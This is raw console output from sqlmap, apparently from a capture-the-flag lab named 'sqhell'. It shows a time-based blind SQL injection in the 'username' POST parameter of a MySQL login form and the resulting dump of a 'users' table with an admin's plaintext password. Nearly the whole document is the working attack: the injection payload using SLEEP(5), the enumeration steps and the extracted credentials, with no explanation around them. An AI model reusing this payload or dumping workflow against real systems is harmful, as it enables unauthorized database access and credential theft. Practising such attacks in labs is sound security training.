        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.6.6#pip}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:42:12 /2022-07-08/

[11:42:12] [INFO] parsing HTTP request from 'login.txt'
[11:42:12] [INFO] resuming back-end DBMS 'mysql' 
[11:42:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 4000 FROM (SELECT(SLEEP(5)))tjwj) AND 'Tlqc'='Tlqc&password=admin
---
[11:42:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.18.0
back-end DBMS: MySQL >= 5.0.12
[11:42:12] [INFO] sqlmap will dump entries of all tables from all databases now
[11:42:12] [INFO] fetching tables for database: 'sqhell_2'
[11:42:12] [INFO] fetching number of tables for database 'sqhell_2'
[11:42:12] [INFO] resumed: 1
[11:42:12] [INFO] resumed: users
[11:42:12] [INFO] fetching columns for table 'users' in database 'sqhell_2'
[11:42:12] [INFO] resumed: 3
[11:42:12] [INFO] resumed: id
[11:42:12] [INFO] resumed: username
[11:42:12] [INFO] resumed: password
[11:42:12] [INFO] fetching entries for table 'users' in database 'sqhell_2'
[11:42:12] [INFO] fetching number of entries for table 'users' in database 'sqhell_2'
[11:42:12] [INFO] resumed: 1
[11:42:12] [INFO] resumed: 1
[11:42:12] [INFO] resumed: icantrememberthispasswordcanyou
[11:42:12] [INFO] resumed: admin
Database: sqhell_2
Table: users
[1 entry]
+----+---------------------------------+----------+
| id | password                        | username |
+----+---------------------------------+----------+
| 1  | icantrememberthispasswordcanyou | admin    |
+----+---------------------------------+----------+

[11:42:12] [INFO] table 'sqhell_2.users' dumped to CSV file '/home/berran/.local/share/sqlmap/output/10.10.216.221/dump/sqhell_2/users.csv'
[11:42:12] [INFO] fetched data logged to text files under '/home/berran/.local/share/sqlmap/output/10.10.216.221'

[*] ending @ 11:42:12 /2022-07-08/

